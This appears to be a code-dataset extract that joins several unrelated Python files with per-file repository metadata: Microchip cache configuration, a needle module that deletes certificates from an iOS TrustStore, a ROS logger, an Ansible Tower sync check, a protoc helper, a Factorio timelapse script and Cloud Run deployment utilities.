* ANY WAY RELATED TO THIS SOFTWARE WILL NOT EXCEED THE AMOUNT OF FEES, IF ANY,
* THAT YOU HAVE PAID DIRECTLY TO MICROCHIP FOR THIS SOFTWARE.
*****************************************************************************"""
Log.writeInfoMessage("Loading Cache for " + Variables.get("__PROCESSOR"))
def cacheEnable(symbol, event):
symbol.setValue(event["value"], 1)
def cacheFilesEnable(symbol, event):
symbol.setEnabled(event["value"])
dcacheEnable = coreComponent.createBooleanSymbol("USE_CACHE_MAINTENANCE", cacheMenu)
dcacheEnable.setLabel("Use Cache Maintenance")
dcacheEnable.setDefaultValue(False)
dcacheEnable = coreComponent.createBooleanSymbol("DATA_CACHE_ENABLE", cacheMenu)
dcacheEnable.setLabel("Enable Data Cache")
dcacheEnable.setDefaultValue(False)
dcacheEnable.setVisible(False)
dcacheEnable.setReadOnly(True)
dcacheEnable.setDependencies(cacheEnable, ["USE_CACHE_MAINTENANCE"])
icacheEnable = coreComponent.createBooleanSymbol("INSTRUCTION_CACHE_ENABLE", cacheMenu)
icacheEnable.setLabel("Enable Instruction Cache")
icacheEnable.setDefaultValue(False)
icacheEnable.setVisible(False)
icacheEnable.setReadOnly(True)
icacheEnable.setDependencies(cacheEnable, ["USE_CACHE_MAINTENANCE"])
cacheAlign = coreComponent.createIntegerSymbol("CACHE_ALIGN", cacheMenu)
cacheAlign.setLabel("Cache Alignment Length")
cacheAlign.setVisible(False)
cacheAlign.setDefaultValue(16)
############################################################################
#### Code Generation ####
############################################################################
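# Each FileSymbol below maps a template under ../peripheral/cache/templates to
# a generated file in the project's config/<name>/peripheral/cache directory;
# all of them are toggled together by the USE_CACHE_MAINTENANCE symbol.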
configName = Variables.get("__CONFIGURATION_NAME")
cacheSourceFile = coreComponent.createFileSymbol("CACHE_LOCAL_H", None)
cacheSourceFile.setSourcePath("../peripheral/cache/templates/plib_cache_local.h")
cacheSourceFile.setOutputName("plib_cache_local.h")
cacheSourceFile.setDestPath("peripheral/cache/")
cacheSourceFile.setProjectPath("config/" + configName + "/peripheral/cache/")
cacheSourceFile.setType("SOURCE")
cacheSourceFile.setEnabled(False)
cacheSourceFile.setDependencies(cacheFilesEnable, ["USE_CACHE_MAINTENANCE"])
cacheHeaderFile = coreComponent.createFileSymbol("CACHE_HEADER_H", None)
cacheHeaderFile.setSourcePath("../peripheral/cache/templates/plib_cache.h")
cacheHeaderFile.setOutputName("plib_cache.h")
cacheHeaderFile.setDestPath("peripheral/cache/")
cacheHeaderFile.setProjectPath("config/" + configName + "/peripheral/cache/")
cacheHeaderFile.setType("HEADER")
cacheHeaderFile.setEnabled(False)
cacheHeaderFile.setDependencies(cacheFilesEnable, ["USE_CACHE_MAINTENANCE"])
cacheSourcePic32MzFile = coreComponent.createFileSymbol("CACHE_SOURCE_PIC32MZ_C", None)
cacheSourcePic32MzFile.setSourcePath("../peripheral/cache/templates/plib_cache_pic32mz.c")
cacheSourcePic32MzFile.setOutputName("plib_cache.c")
cacheSourcePic32MzFile.setDestPath("peripheral/cache/")
cacheSourcePic32MzFile.setProjectPath("config/" + configName + "/peripheral/cache/")
cacheSourcePic32MzFile.setType("SOURCE")
cacheSourcePic32MzFile.setEnabled(False)
cacheSourcePic32MzFile.setDependencies(cacheFilesEnable, ["USE_CACHE_MAINTENANCE"])
cacheHeaderPic32MzFile = coreComponent.createFileSymbol("CACHE_PIC32MZ_H", None)
cacheHeaderPic32MzFile.setSourcePath("../peripheral/cache/templates/plib_cache_pic32mz.h")
cacheHeaderPic32MzFile.setOutputName("plib_cache_pic32mz.h")
cacheHeaderPic32MzFile.setDestPath("peripheral/cache/")
cacheHeaderPic32MzFile.setProjectPath("config/" + configName + "/peripheral/cache/")
cacheHeaderPic32MzFile.setType("HEADER")
cacheHeaderPic32MzFile.setEnabled(False)
cacheHeaderPic32MzFile.setDependencies(cacheFilesEnable, ["USE_CACHE_MAINTENANCE"])
cacheSourcePic32MzAsm = coreComponent.createFileSymbol("CACHE_SOURCE_PIC32MZ_S", None)
cacheSourcePic32MzAsm.setSourcePath("../peripheral/cache/templates/plib_cache_pic32mz.S")
cacheSourcePic32MzAsm.setOutputName("plib_cache_pic32mz.S")
cacheSourcePic32MzAsm.setDestPath("peripheral/cache/")
cacheSourcePic32MzAsm.setProjectPath("config/" + configName + "/peripheral/cache/")
cacheSourcePic32MzAsm.setType("SOURCE")
cacheSourcePic32MzAsm.setEnabled(False)
cacheSourcePic32MzAsm.setDependencies(cacheFilesEnable, ["USE_CACHE_MAINTENANCE"])
cacheSystemDefFile = coreComponent.createFileSymbol("CACHE_SYSTEM_DEF_H", None)
cacheSystemDefFile.setType("STRING")
cacheSystemDefFile.setOutputName("core.LIST_SYSTEM_DEFINITIONS_H_INCLUDES")
cacheSystemDefFile.setSourcePath("../peripheral/cache/templates/system/definitions.h.ftl")
cacheSystemDefFile.setMarkup(True)
cacheSystemDefFile.setEnabled(False)
cacheSystemDefFile.setDependencies(cacheFilesEnable, ["USE_CACHE_MAINTENANCE"])
| 51.178571 | 90 | 0.786113 | 550 | 5,732 | 8.076364 | 0.32 | 0.05403 | 0.042774 | 0.049977 | 0.255065 | 0.056506 | 0.035795 | 0 | 0 | 0 | 0 | 0.013244 | 0.064724 | 5,732 | 111 | 91 | 51.63964 | 0.815333 | 0.232903 | 0 | 0.027778 | 0 | 0 | 0.271567 | 0.139447 | 0 | 0 | 0 | 0 | 0 | 1 | 0.027778 | false | 0 | 0 | 0 | 0.027778 | 0 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0 |
0b910569942467e577079fe4e9a61358382e951f | 2,087 | py | Python | needle/modules/comms/certs/delete_ca.py | yeyintminthuhtut/needle | c8bb63de88553fed2196f6c56033935b84c6aaaf | [
"BSD-3-Clause"
] | 2 | 2021-01-11T07:11:29.000Z | 2021-12-21T00:57:47.000Z | needle/modules/comms/certs/delete_ca.py | yeyintminthuhtut/needle | c8bb63de88553fed2196f6c56033935b84c6aaaf | [
"BSD-3-Clause"
] | null | null | null | needle/modules/comms/certs/delete_ca.py | yeyintminthuhtut/needle | c8bb63de88553fed2196f6c56033935b84c6aaaf | [
"BSD-3-Clause"
] | null | null | null | from core.framework.module import BaseModule
from core.utils.constants import Constants
import imp
class Module(BaseModule):
meta = {
'name': 'Delete Installed Certificate',
'author': '@LanciniMarco (@MWRLabs)',
'description': 'Delete one (or more) certificates installed on device',
'options': (
),
}
# ==================================================================================================================
# UTILS
# ==================================================================================================================
def module_pre(self):
return BaseModule.module_pre(self, bypass_app=True)
def pull_ts(self):
self.printer.info("Looking for the TrustStore.sqlite3 file...")
self.truststore_path = Constants.DEVICE_PATH_TRUST_STORE
self.db = self.local_op.build_temp_path_for_file(self, "TrustStore.sqlite3")
if not self.device.remote_op.file_exist(self.truststore_path):
raise Exception("TrustStore file not found on device!")
else:
self.device.pull(self.truststore_path, self.db)
# ==================================================================================================================
# RUN
# ==================================================================================================================
def module_run(self):
# Pull TrustStore.sqlite3
self.pull_ts()
# Delete certificates
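        # load the bundled AdvTrustStore script at runtime so its TrustStore
        # helper can parse and edit the pulled sqlite database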
adv = imp.load_source("TrustStore", self.TOOLS_LOCAL['ADVTRUSTSTORE'])
tstore = adv.TrustStore(self.db)
tstore.delete_certificates()
# Backup
self.printer.debug("Backing up the original TrustStore...")
bkp = "%s.bkp" % Constants.DEVICE_PATH_TRUST_STORE
self.device.remote_op.file_copy(self.truststore_path, bkp)
# Updating device
self.printer.info("Uploading new TrustStore to device...")
self.device.push(self.db, self.truststore_path)
| 41.74 | 121 | 0.490656 | 185 | 2,087 | 5.378378 | 0.427027 | 0.084422 | 0.090452 | 0.048241 | 0.106533 | 0.066332 | 0 | 0 | 0 | 0 | 0 | 0.001818 | 0.209391 | 2,087 | 49 | 122 | 42.591837 | 0.601212 | 0.256828 | 0 | 0 | 0 | 0 | 0.222669 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0.096774 | false | 0.032258 | 0.096774 | 0.032258 | 0.290323 | 0.096774 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0 |
0b91a1dbe73bc84767866f323394da7c9dd14b22 | 5,212 | py | Python | script/caster_log.py | CasterLab/caster_app | 28e3e4edd68e2122ff793d2ee4a9f1f5c90b532b | [
"MIT"
] | null | null | null | script/caster_log.py | CasterLab/caster_app | 28e3e4edd68e2122ff793d2ee4a9f1f5c90b532b | [
"MIT"
] | null | null | null | script/caster_log.py | CasterLab/caster_app | 28e3e4edd68e2122ff793d2ee4a9f1f5c90b532b | [
"MIT"
] | 2 | 2020-03-02T06:56:48.000Z | 2020-10-25T09:49:30.000Z | #!/usr/bin/env python
import time
import rospy
import csv
import sys
from math import pow, sqrt
from diagnostic_msgs.msg import DiagnosticArray
from nav_msgs.msg import Odometry
from sensor_msgs.msg import Imu
class Log():
"""docstring for Log"""
def __init__(self):
self._sub = rospy.Subscriber("/diagnostics", DiagnosticArray, self.diagnosticsCallback)
self._sub = rospy.Subscriber("/odom", Odometry, self.odomCallback)
self._sub = rospy.Subscriber("/imu_data", Imu, self.imuCallback)
self.dict_log = dict()
self.datas_log = []
self.time_init = [0, 0, 0]
self.time_now = [0, 0, 0]
self.time_use = [0, 0, 0]
self.time_log = 0
self.file_name = ''
self.time_now_name = ''
self.args_num = len(sys.argv)
self.ROCS_writer = False
self.IMU_writer = False
self.ODOM_writer = False
self.distance = 0
self.pose_x_last = 0
self.pose_y_last = 0
def diagnosticsCallback(self, msg):
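        # record the battery's relative state of charge (ROCS) from the BMS
        # diagnostics, throttled to one CSV row every 600 seconds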
if self.ROCS_writer:
self.time_log = self.time_now[0] - self.time_init[0]
if msg.status[0].name == 'hongfu_bms_status_node: BMS':
self.time_now[0] = msg.header.stamp.secs
if self.time_init[0] == 0 or self.time_log >= 600:
ROCS = msg.status[0].values[0].value
dict_ROCS = {'ROCS':ROCS, 'time1':self.time_use[0]}
print(dict_ROCS)
# dict_log.update(xx)
# self.datas_log.append(self.dict_log)
self.logWriter('ROCS', 'ab+', 'time1', dict_ROCS)
self.time_init[0] = self.time_now[0]
self.time_use[0] += 10
def imuCallback(self, msg):
# rospy.loginfo('imu1')
if self.IMU_writer:
self.time_log = self.time_now[1] - self.time_init[1]
self.time_now[1] = msg.header.stamp.secs
if self.time_init[1] == 0 or self.time_log >= 1800:
x = msg.orientation.x
y = msg.orientation.y
z = msg.orientation.z
w = msg.orientation.w
orientation = 'x:' + str(x) + ' y:' + str(y) + ' z:' + str(z) +' w:' + str(w)
dict_orientation = {'orientation':orientation, 'time2':self.time_use[1]}
# self.dict_log.update(dict_orientation)
print(self.dict_log)
self.logWriter('orientation', 'ab+', 'time2', dict_orientation)
self.time_init[1] = self.time_now[1]
self.time_use[1] += 30
def odomCallback(self, msg):
if self.ODOM_writer:
self.pose_x_now = msg.pose.pose.position.x
self.pose_y_now = msg.pose.pose.position.y
if self.pose_x_last == 0:
self.pose_x_last = msg.pose.pose.position.x
self.pose_y_last = msg.pose.pose.position.y
distance_last = sqrt(pow(self.pose_x_now - self.pose_x_last, 2) + pow(self.pose_y_now - self.pose_y_last, 2))
self.distance = self.distance + distance_last
self.time_log = self.time_now[2] - self.time_init[2]
self.time_now[2] = msg.header.stamp.secs
if self.time_init[2] == 0 or self.time_log >= 120:
dict_odom = {'odom':self.distance, 'time3':self.time_use[2]}
# self.dict_log.update(dict_odom)
print(self.dict_log)
self.logWriter('odom', 'wb+', 'time3', dict_odom)
self.time_init[2] = self.time_now[2]
self.time_use[2] += 2
def logWriter(self, status, file_option, time_option, dict_option):
# rospy.loginfo('writer1')
if self.file_name == '':
# rospy.loginfo('writer2')
self.time_now_name = time.strftime("%Y%m%d%H%M", time.localtime())
self.file_name = 'caster-test-log-' + status + self.time_now_name + '.csv'
with open('/home/caster/Documents/caster-tests/logs/'+self.file_name, file_option) as f:
writer = csv.DictWriter(f, [status, time_option])
rospy.loginfo('write' + status)
# if csv.Sniffer().has_header(f.read(1024)):
            f.seek(0)
            if f.read(1024) == '':
writer.writeheader()
# for row in dict_log:
writer.writerow(dict_option)
# writer.writerows(self.dict_log)
def getArgs(self):
args_number = len(sys.argv)
args_list = sys.argv
if args_number != 1:
for index in range(args_number):
if args_list[index] == 'ROCS':
self.ROCS_writer = True
elif args_list[index] == 'IMU':
self.IMU_writer = True
elif args_list[index] == 'ODOM':
self.ODOM_writer = True
else:
rospy.logerr('please input args')
rospy.signal_shutdown('please input args')
def main():
rospy.init_node('caster_test_log')
Logs = Log()
Logs.getArgs()
rospy.spin()
if __name__ == "__main__":
try:
main()
except rospy.ROSInterruptException:
pass
| 40.403101 | 121 | 0.557751 | 674 | 5,212 | 4.108309 | 0.204748 | 0.106898 | 0.051643 | 0.018779 | 0.273023 | 0.193211 | 0.127844 | 0.09173 | 0 | 0 | 0 | 0.022203 | 0.317345 | 5,212 | 128 | 122 | 40.71875 | 0.756043 | 0.064083 | 0 | 0.018868 | 0 | 0 | 0.05863 | 0.013166 | 0 | 0 | 0 | 0 | 0 | 1 | 0.066038 | false | 0.009434 | 0.075472 | 0 | 0.150943 | 0.028302 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0 |
0b93b80f280d4e5b824d6da30fa8ee84290f10b4 | 2,242 | py | Python | atacac/synchronize.py | europ/aacac | ec73114d61358f28e937970adc43f7433eb0006e | [
"MIT"
] | 7 | 2020-05-05T14:42:57.000Z | 2020-12-15T11:22:08.000Z | atacac/synchronize.py | europ/aacac | ec73114d61358f28e937970adc43f7433eb0006e | [
"MIT"
] | 5 | 2020-05-19T12:34:51.000Z | 2020-08-05T11:14:17.000Z | atacac/synchronize.py | europ/aacac | ec73114d61358f28e937970adc43f7433eb0006e | [
"MIT"
] | 2 | 2020-09-14T09:12:19.000Z | 2021-04-13T10:11:22.000Z | import glob
import click
from atacac._utils import log, tower_list_all, load_asset
@click.command()
@click.argument('label_id', envvar='LABEL_ID')
@click.argument('assets_glob', envvar='ASSETS_GLOB')
def main(label_id, assets_glob):
"""
Check for missing assets.
\f
    Check if the repository's assets exist in Tower under a specific label and
vice versa.
!! ASSETS_GLOB must be in single quotes to prevent glob pattern expansion in
shell.
\b
    Following arguments can be passed via environment variables:
* LABEL_ID
* ASSETS_GLOB
"""
# list of asset type+name in repository
local_assets = []
for file_name in sorted(glob.glob(assets_glob, recursive=True)):
asset = load_asset(file_name)
local_assets.append((asset['asset_type'], asset['name']))
# list of asset type+name in tower
tower_assets = [
(item['type'], item['name'])
for item in tower_list_all([('labels', label_id)])
]
common_assets = set(tower_assets).intersection(set(local_assets))
for asset_type, asset_name in common_assets:
log('INFO', (f"'{asset_name}' of type {asset_type} located both in the "
"repository and in the tower"))
# symmetric difference == disjunctive union == union without the intersection
diff = set(tower_assets).symmetric_difference(set(local_assets))
error = False
for asset in diff:
asset_type, asset_name = asset
if asset not in tower_assets:
log('WARNING', (f"'{asset_name}' of type {asset_type} not found in "
"tower ... will be recreated"))
elif asset not in local_assets:
error = True
log('ERROR', (f"'{asset_name}' of type {asset_type} not found in "
"repository ... will be reported (not allowed)"))
if error:
log('INFO', (
"Investigate if the asset should be deleted from tower, "
"added to the repository, or it's label removed."
))
log('ERROR', "Reported error(s) are not permitted!", fatal=True)
if __name__ == "__main__":
# pylint: disable=unexpected-keyword-arg,no-value-for-parameter
main()
| 32.492754 | 81 | 0.632917 | 295 | 2,242 | 4.637288 | 0.352542 | 0.052632 | 0.030702 | 0.039474 | 0.100146 | 0.100146 | 0.069444 | 0.05117 | 0.05117 | 0.05117 | 0 | 0 | 0.26182 | 2,242 | 68 | 82 | 32.970588 | 0.826586 | 0.225691 | 0 | 0 | 0 | 0 | 0.29184 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0.026316 | false | 0 | 0.078947 | 0 | 0.105263 | 0 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0 |
0b990de9cfa031b643b3e8decac5fcb265580182 | 1,517 | py | Python | proto_builder/core/bin_manager.py | wcodesoft/proto-builder | b2e3f38d699c220903abec90138ee196db32481e | [
"MIT"
] | null | null | null | proto_builder/core/bin_manager.py | wcodesoft/proto-builder | b2e3f38d699c220903abec90138ee196db32481e | [
"MIT"
] | null | null | null | proto_builder/core/bin_manager.py | wcodesoft/proto-builder | b2e3f38d699c220903abec90138ee196db32481e | [
"MIT"
] | null | null | null | import platform
import click
PROTO_VERSION = "3.19.2"
PROTO_REPO = "https://github.com/protocolbuffers/protobuf/releases"
class ProtoBin(object):
def __init__(self, protoc_filename: str, system_os: str):
"""
Initializes the ProtoBin object.
:param protoc_filename: The name of the protoc binary that's platform dependent.
:param system_os: The OS where the proto_builder is being used.
"""
self.protoc_filename = protoc_filename
self.platform = system_os
self.proto_c_zip_file_name = f"{self.protoc_filename}.zip"
self.proto_c_url = f"{PROTO_REPO}/download/v{PROTO_VERSION}/{self.proto_c_zip_file_name}"
def get_platform() -> ProtoBin:
"""
Gets the string representing the platform running the code.
:return: the system string to download files from Protobuf git
"""
click.echo("Discovering OS ...")
system = platform.system()
click.echo(f"System is {system}. Creating binary urls for the platform.")
if system == "Linux":
return ProtoBin(protoc_filename=f"protoc-{PROTO_VERSION}-linux-x86_64",
system_os="linux")
elif system == "Darwin":
return ProtoBin(protoc_filename=f"protoc-{PROTO_VERSION}-osx-x86_64",
system_os='mac')
else:
return ProtoBin(protoc_filename=f"protoc-{PROTO_VERSION}-win64",
system_os='win')
def in_wsl() -> bool:
return 'microsoft-standard' in platform.uname().release
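

# Minimal usage sketch: resolve and print the platform-specific protoc
# download URL for this host (no download is performed).
if __name__ == "__main__":
    proto_bin = get_platform()
    click.echo(f"protoc archive: {proto_bin.proto_c_url}")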
| 34.477273 | 97 | 0.662492 | 195 | 1,517 | 4.948718 | 0.415385 | 0.116062 | 0.055959 | 0.087047 | 0.189637 | 0.189637 | 0.146114 | 0.146114 | 0 | 0 | 0 | 0.011976 | 0.2294 | 1,517 | 43 | 98 | 35.27907 | 0.813516 | 0.197759 | 0 | 0 | 0 | 0 | 0.313472 | 0.163212 | 0 | 0 | 0 | 0 | 0 | 1 | 0.12 | false | 0 | 0.08 | 0.04 | 0.4 | 0 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0 |
0b9be1ac82e683a0e1c250704aaff0a44bb4954a | 1,319 | py | Python | run-screenshots.py | Larandar/timelapse-screenshot | 3ee48ee9ef4535c27da0c3d0efefa316a7bf1124 | [
"MIT"
] | 18 | 2020-02-28T10:22:29.000Z | 2022-01-22T08:20:22.000Z | run-screenshots.py | Larandar/timelapse-screenshot | 3ee48ee9ef4535c27da0c3d0efefa316a7bf1124 | [
"MIT"
] | null | null | null | run-screenshots.py | Larandar/timelapse-screenshot | 3ee48ee9ef4535c27da0c3d0efefa316a7bf1124 | [
"MIT"
] | 1 | 2020-03-07T22:13:57.000Z | 2020-03-07T22:13:57.000Z | import os
from subprocess import Popen
from shutil import copyfile
script_filepath = os.path.realpath(__file__)
script_folder = os.path.dirname(script_filepath)
#save_folder = script_folder + '../../saves/0.17-Built-in-timelapse'
save_folder = os.path.join(script_folder, '..' , '..', 'saves', '0.17-Built-in-timelapse')
# create a copy of control.lua
copied_file_name = 'python-copy-control.lua'
copyfile('control.lua', copied_file_name)
for f in os.listdir(save_folder):
filename_end = '.zip'
if f[-len(filename_end):] == filename_end:
# write into control.lua
output_file = open('control.lua', 'w')
with open(copied_file_name, 'r') as control_file:
all_lines = control_file.readlines()
for l in all_lines:
output_line = l
line_start = ' local timelapse_subfolder = '
if l[:len(line_start)] == line_start:
output_line = line_start + "'" + f[:-len(filename_end)] + "/'\n"
output_file.write(output_line)
output_file.close()
bin_path = os.path.join(script_folder, '..', '..', 'bin', 'Releasex64vs2017', 'factorio-run.exe')
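        # --benchmark-graphics replays the save with rendering enabled for the
        # requested number of ticks, letting control.lua capture its screenshots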
process_line = bin_path + ' --benchmark-graphics ' + str(os.path.join('0.17-Built-in-timelapse' , f)) + ' --benchmark-ticks 21'
process = Popen(process_line)
process.communicate()
os.remove(copied_file_name) | 38.794118 | 129 | 0.68461 | 185 | 1,319 | 4.643243 | 0.378378 | 0.034924 | 0.065192 | 0.034924 | 0.199069 | 0.083818 | 0.083818 | 0.083818 | 0 | 0 | 0 | 0.015371 | 0.161486 | 1,319 | 34 | 130 | 38.794118 | 0.761302 | 0.09022 | 0 | 0 | 0 | 0 | 0.186144 | 0.057596 | 0 | 0 | 0 | 0 | 0 | 1 | 0 | false | 0 | 0.115385 | 0 | 0.115385 | 0 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0 |
0b9ebd7f50ebcf431c15405bf1d6de861cfd7ba8 | 9,639 | py | Python | clarify/serve/utils/cloudrun_utils.py | cwbeitel/clarify | b54bde103684f19b2da1e455c4231aeb6ad0a771 | [
"Apache-2.0"
] | 8 | 2020-01-24T20:53:21.000Z | 2021-04-02T11:18:56.000Z | clarify/serve/utils/cloudrun_utils.py | cwbeitel/clarify | b54bde103684f19b2da1e455c4231aeb6ad0a771 | [
"Apache-2.0"
] | 123 | 2020-01-16T00:29:27.000Z | 2022-03-08T23:39:36.000Z | clarify/serve/utils/cloudrun_utils.py | hmallen99/project_clarify | 2753e82046a8fa94e55165f84b154ecdacdeb558 | [
"Apache-2.0"
] | 4 | 2020-02-01T05:11:37.000Z | 2020-03-22T23:35:45.000Z | # Licensed under the Apache License, Version 2.0 (the "License");
# you may not use this file except in compliance with the License.
# You may obtain a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS,
# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
# See the License for the specific language governing permissions and
# limitations under the License.
from clarify.utils.cmd_utils import run_and_output
from clarify.utils.gcb_utils import generate_image_tag
from clarify.utils.gcb_utils import gcb_build_and_push
from clarify.utils.fs_utils import get_pcml_root
from clarify.utils.fs_utils import TemporaryDirectory
from clarify.serve.utils import deployment_utils
import datetime
import os
import yaml
import uuid
import re
import dateutil
import tensorflow as tf
from google.cloud import pubsub_v1
from google.oauth2 import service_account
import googleapiclient.discovery
from googleapiclient import _auth
credentials = _auth.default_credentials()
service = googleapiclient.discovery.build('iam', 'v1', credentials=credentials)
crm_service = googleapiclient.discovery.build('cloudresourcemanager',
'v1',
credentials=credentials)
cloudbuild = googleapiclient.discovery.build('cloudbuild',
'v1',
credentials=credentials)
def latest_successful_build(image_uri, project_id):
"""Given an image URI get the most recent green cloudbuild."""
builds = cloudbuild.projects().builds().list(projectId=project_id).execute()
uri_prefix = image_uri.split(":")[0]
latest_time = None
latest = None
for build in builds["builds"]:
if build["status"] == "SUCCESS":
images = build["images"]
if len(images) == 1:
if images[0].startswith(uri_prefix):
finish_time = dateutil.parser.parse(build["finishTime"])
if not latest:
latest_time = finish_time
if finish_time >= latest_time:
latest = images[0]
latest_time = finish_time
if latest:
tf.logging.info("Found a latest successful build: {}".format(latest))
return latest
def _build_cloud_run_image(function_name,
project_id,
default_cache_from="tensorflow/tensorflow:1.14.0"):
function_code_path = "functions/{}".format(function_name)
pcml_lib_root = os.path.join(get_pcml_root(), "pcml")
with TemporaryDirectory() as tmpdir:
tmp_lib_path = deployment_utils.prepare_functions_bundle(
function_code_path=function_code_path,
tmpdir=tmpdir,
pcml_lib_root=pcml_lib_root)
image_uri = generate_image_tag(project_id, function_name)
cache_from = latest_successful_build(image_uri=image_uri,
project_id=project_id)
if not cache_from:
cache_from = default_cache_from
gcb_build_and_push(image_tag=image_uri,
build_dir=tmp_lib_path,
cache_from=cache_from)
return image_uri
def update_service(function_name,
image_uri,
region,
memory="2Gi",
concurrency=40,
timeout="10m"):
"""Update a cloud run service given a container image."""
run_and_output([
"gcloud", "beta", "run", "deploy", "--platform", "managed", "--region",
region, function_name, "--image", image_uri, "--memory", memory,
"--timeout", timeout, "--concurrency",
str(concurrency)
])
def get_domain_for_cloudrun_service(service_name, region):
out = run_and_output([
"gcloud", "beta", "run", "services", "describe", service_name,
"--platform", "managed", "--region", region
])
domain = None
for line in out.split("\n"):
if "domain" in line:
domain = line.split("domain:")[1].split(" ")[1]
return domain
def list_service_accounts(project_id):
"""Lists all service accounts for the current project."""
service_accounts = service.projects().serviceAccounts().list(
name='projects/' + project_id).execute()
return service_accounts
def service_account_exists(service_account_email, project):
service_accounts = list_service_accounts(project)
for account in service_accounts["accounts"]:
if service_account_email == account["email"]:
return account
return None
def maybe_create_service_account(service_account_name, project):
service_account_email = "{}@{}.iam.gserviceaccount.com".format(
service_account_name, project)
if not service_account_exists(service_account_email=service_account_email,
project=project):
service_account = service.projects().serviceAccounts().create(
name='projects/' + project,
body={
'accountId': service_account_name,
'serviceAccount': {
'displayName': service_account_name
}
}).execute()
tf.logging.info('Created service account: ' + service_account['email'])
return service_account_email
def configure_invoker_sa(service_name, project, region):
service_account_name = "{}-invoker".format(service_name)
service_account_email = maybe_create_service_account(service_account_name,
project)
member_arg = "--member=serviceAccount:{}".format(service_account_email)
role_arg = "--role=roles/run.invoker"
run_and_output([
"gcloud", "beta", "run", "services", "add-iam-policy-binding",
"--platform", "managed", "--region", region, service_name, member_arg,
role_arg
])
return service_account_email
def get_project_number(project):
project_number = None
project_data = crm_service.projects().get(projectId=project).execute()
if project_data:
project_number = project_data["projectNumber"]
return project_number
def maybe_add_pubsub_token_creator_policy(project_id):
project_number = get_project_number(project_id)
pubsub_sa = "service-{}".format(project_number)
pubsub_sa += "@gcp-sa-pubsub.iam.gserviceaccount.com"
member_arg = "--member=serviceAccount:{}".format(pubsub_sa)
role_arg = "--role=roles/iam.serviceAccountTokenCreator"
run_and_output([
"gcloud", "projects", "add-iam-policy-binding", project_number,
member_arg, role_arg
])
def list_subscriptions_in_project(project_id):
"""Lists all subscriptions in the current project."""
subscriber = pubsub_v1.SubscriberClient()
project_path = subscriber.project_path(project_id)
subscriptions = subscriber.list_subscriptions(project_path)
return [subscription.name for subscription in subscriptions]
def maybe_create_topic(project, topic_name):
msg = "Creating topic {} in project {}".format(topic_name, project)
tf.logging.info(msg)
publisher = pubsub_v1.PublisherClient()
topic_path = publisher.topic_path(project, topic_name)
project_path = publisher.project_path(project)
topic_paths = [topic.name for topic in publisher.list_topics(project_path)]
if topic_path not in topic_paths:
topic = publisher.create_topic(topic_path)
def maybe_create_subscription_for_service(service_name, service_account_email,
service_url, project, region,
topic_name):
subscriptions = list_subscriptions_in_project(project)
# Create a unique subscription ID
subscription_name = "{}-{}".format(service_name, topic_name)
subscriber = pubsub_v1.SubscriberClient()
subscription_path = subscriber.subscription_path(project, subscription_name)
publisher = pubsub_v1.PublisherClient()
topic_path = publisher.topic_path(project, topic_name)
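    # the push subscription POSTs each message to the Cloud Run URL and
    # authenticates as the invoker service account created above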
if subscription_path not in subscriptions:
run_and_output([
"gcloud", "beta", "pubsub", "subscriptions", "create",
subscription_path, "--topic", topic_path,
"--push-endpoint={}".format(service_url),
"--push-auth-service-account={}".format(service_account_email)
])
def deploy_cloud_run_topic_responder(project,
region,
function_name,
memory="2Gi",
concurrency=80,
timeout="14m"):
image_uri = _build_cloud_run_image(function_name, project)
function_name = re.sub("_", "-", function_name)
topic_name = "{}-trigger".format(function_name)
update_service(function_name,
image_uri,
region=region,
memory=memory,
concurrency=concurrency,
timeout=timeout)
domain = get_domain_for_cloudrun_service(service_name=function_name,
region=region)
service_account_email = configure_invoker_sa(service_name=function_name,
project=project,
region=region)
maybe_add_pubsub_token_creator_policy(project)
maybe_create_topic(project=project, topic_name=topic_name)
maybe_create_subscription_for_service(
service_name=function_name,
service_account_email=service_account_email,
service_url=domain,
project=project,
region=region,
topic_name=topic_name)
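

# Minimal sketch of a one-shot deployment; the project and region values
# below are hypothetical placeholders.
if __name__ == '__main__':
    deploy_cloud_run_topic_responder(project='example-project',
                                     region='us-central1',
                                     function_name='example_function')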
